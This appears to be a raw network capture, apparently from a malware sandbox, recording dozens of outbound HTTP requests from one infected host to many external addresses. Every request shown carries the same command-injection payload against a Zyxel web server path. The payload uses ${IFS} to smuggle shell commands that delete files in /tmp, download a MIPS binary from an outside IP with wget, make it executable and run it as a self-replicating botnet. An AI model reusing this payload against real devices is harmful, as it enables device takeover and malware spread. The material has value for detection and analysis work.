                                    Jan 13, 2024 19:02:49.533674955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8195192.168.2.1359464102.66.119.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533726931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8196192.168.2.1351780100.155.56.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533786058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8197192.168.2.1333754102.69.218.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533852100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8198192.168.2.1353582217.168.119.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533905983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8199192.168.2.1352258166.19.132.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533957958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8200192.168.2.1340134165.34.78.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.533993959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8201192.168.2.1347794212.251.50.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534054041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8202192.168.2.1337786181.140.77.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534085989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8203192.168.2.1334306151.104.64.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534158945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8204192.168.2.1348660109.80.8.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534219980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8205192.168.2.1341326223.190.104.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534276009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8206192.168.2.134892046.61.125.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534357071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8207192.168.2.1348642172.148.69.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534419060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8208192.168.2.1350626107.72.152.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534499884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8209192.168.2.134080424.110.97.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534573078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8210192.168.2.1341074180.162.138.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534610987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8211192.168.2.1334966181.93.18.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534672022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8212192.168.2.133596484.237.72.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534725904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8213192.168.2.134482496.28.198.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534776926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8214192.168.2.135028893.204.250.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534822941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8215192.168.2.1359040177.121.92.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534878016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8216192.168.2.1345980130.139.249.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534920931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8217192.168.2.1349714150.226.98.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.534986973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8218192.168.2.1357092185.55.255.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535044909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8219192.168.2.133321634.207.183.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535094976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8220192.168.2.133663083.105.144.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535132885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8221192.168.2.1334684128.57.124.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535173893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8222192.168.2.1339454188.110.126.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535214901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8223192.168.2.1360232114.36.33.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535274982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8224192.168.2.1347386202.226.237.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535362005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8225192.168.2.135977840.79.65.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535440922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8226192.168.2.133348812.60.75.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535512924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8227192.168.2.133564683.30.232.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535552025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8228192.168.2.1346180179.215.184.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535609007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8229192.168.2.1340540174.56.132.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535640001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8230192.168.2.1357938137.57.150.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535711050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8231192.168.2.1342476169.149.255.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535757065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8232192.168.2.133906837.160.11.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535823107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8233192.168.2.1356258177.45.57.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535875082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8234192.168.2.1335030219.149.138.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535937071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8235192.168.2.1352846212.188.107.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.535996914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8236192.168.2.134082238.251.147.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536053896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8237192.168.2.133501446.57.141.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536108971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8238192.168.2.1334474168.18.185.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536137104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8239192.168.2.1353644158.250.254.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536185980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8240192.168.2.135587462.28.14.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536238909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8241192.168.2.134320291.115.161.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536307096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8242192.168.2.133706884.203.46.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536351919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8243192.168.2.1360032112.42.190.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536415100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8244192.168.2.135704036.177.182.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536468029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8245192.168.2.1338930132.163.196.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536541939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8246192.168.2.1337234138.41.175.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536592007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8247192.168.2.1335202164.8.6.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536653042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8248192.168.2.135123089.214.223.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536736012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8249192.168.2.1350942120.224.222.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536791086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8250192.168.2.1360428193.209.245.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536809921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8251192.168.2.135706846.118.199.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536885023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8252192.168.2.135336699.13.24.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536948919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8253192.168.2.135297835.184.89.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536948919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8254192.168.2.135615054.86.74.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.536983013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8255192.168.2.1333210125.248.178.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537044048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8256192.168.2.134434645.142.30.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537072897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8257192.168.2.134955818.185.49.124443
                                    TimestampBytes transferredDirectionData
